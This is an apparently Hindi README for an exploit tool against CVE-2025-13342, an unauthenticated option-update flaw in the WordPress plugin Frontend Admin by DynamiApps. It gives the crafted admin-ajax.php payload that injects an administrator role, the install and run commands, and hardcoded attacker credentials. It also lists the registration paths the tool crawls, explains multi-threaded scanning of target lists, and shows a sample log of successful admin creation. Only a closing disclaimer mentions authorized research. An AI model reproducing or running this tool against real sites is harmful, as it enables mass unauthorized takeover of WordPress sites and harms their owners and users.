
Frontend Admin by DynamiApps <= 3.28.20 - बिना प्रमाणीकरण के मनमाने विकल्प अपडेट
Frontend Admin by DynamiApps <= 3.28.20 - बिना प्रमाणीकरण के मनमाना विकल्प अपडेट
__ __ _ _ _ ___ ,________ _
/ ()(| |_// () / )/ \/ )|__ /| __/ __/| |/ )
| | | >- ----/| |/ \----| \ \|__|_/
\___/ \/ \___/ /__\_//__\__/ |\__/\__/ |/__
| फ़ील्ड | विवरण |
|---|---|
| CVE ID | CVE-2025-13342 |
| स्कोर | 9.8 गंभीर (CRITICAL) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| प्रभावित | Frontend Admin by DynamiApps ≤ 3.28.20 |
| प्रमाणीकरण | कोई नहीं — पूरी तरह से बिना प्रमाणीकरण |
| प्रकार | अपर्याप्त क्षमता जाँच + इनपुट सत्यापन → मनमाना विकल्प लेखन |
| CWE | CWE-284 · अनुचित अभिगम नियंत्रण |
क्या होता है:
ActionOptions::run() सेव हैंडलर wp_options में लिखने से पहले न तो उपयोगकर्ता क्षमताओं की जाँच करता है और न ही इनपुट को सत्यापित करता है। एक सार्वजनिक ACF फ्रंटएंड फॉर्म एक खुला लेखन चैनल बन जाता है। हमलावर users_can_register=1 और default_role=administrator सेट करता है, फिर एक नया खाता पंजीकृत करता है जिसे स्वचालित रूप से Administrator भूमिका प्राप्त होती है।
यह उपकरण उस दो-चरणीय दृष्टिकोण को छोड़ देता है — यह acff[user][field_*] के माध्यम से उपयोगकर्ता निर्माण फ़ील्ड्स में इंजेक्ट किए गए role=administrator के साथ तैयार किए गए फॉर्म पेलोड को सीधे सबमिट करता है, जिससे एक ही AJAX कॉल में एडमिन खाता बन जाता है।
1. Crawl common registration paths → locate ACF frontend form
2. Parse hidden fields → _acf_nonce, _acf_form
3. Map user fields → username · email · password · role
4. POST /wp-admin/admin-ajax.php
action=frontend_admin/form_submit
acff[user][<role_field>] = administrator
5. {"success":true} → admin account created
6. Log to acf_success.txt
requests
beautifulsoup4
colorama
rich
pip install requests beautifulsoup4 colorama rich
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py
यह उपकरण इंटरैक्टिव है। आपसे चार प्रश्न पूछे जाएँगे:
Targets file path → list.txt
Threads → 10
Timeout (seconds) → 10
Verbose debug → y / N
क्रेडेंशियल्स आंतरिक रूप से निर्धारित हैं:
| फ़ील्ड | मान |
|---|---|
| उपयोगकर्ता नाम | Nxadmin1 |
| ईमेल | [email protected] |
| पासवर्ड | NxAdmin_1337#KSA |
प्रति पंक्ति एक होस्ट — योजना (scheme) वैकल्पिक:
https://target1.com
target2.com
http://target3.com
यह उपकरण प्रति लक्ष्य क्रम से 28 पथों की जाँच करता है, पहले मान्य ACF फॉर्म पर रुकते हुए:
/ /register/ /registration/ /signup/ /sign-up/
/user-registration/ /account/ /my-account/
/frontend-form/ /frontend-register/ ...
| फ़ाइल | सामग्री |
|---|---|
acf_success.txt | पुष्टि किए गए सफल एडमिन निर्माण |
प्रारूप:
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 [email protected] PASS=NxAdmin_1337#KSA JSON={"success":true,...}
टर्मिनल:
[+] Target base: https://target.com
[+] Found form at: https://target.com/register/
_acf_nonce: a1b2c3d4e5
_acf_form: 123
[+] SUCCESS: https://target.com
[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com
| लेखक | Nxploited (Khaled Alenazi) |
| GitHub | github.com/Nxploited |
| Telegram | @KNxploited |
यह उपकरण केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
लेखक स्वामी की स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध किसी भी उपयोग के लिए कोई ज़िम्मेदारी स्वीकार नहीं करता है।
अनधिकृत पहुँच CFAA, CMA और दुनिया भर के समकक्ष कानूनों के तहत अवैध है।
आप अपने कार्यों के लिए पूर्णतः स्वयं ज़िम्मेदार हैं।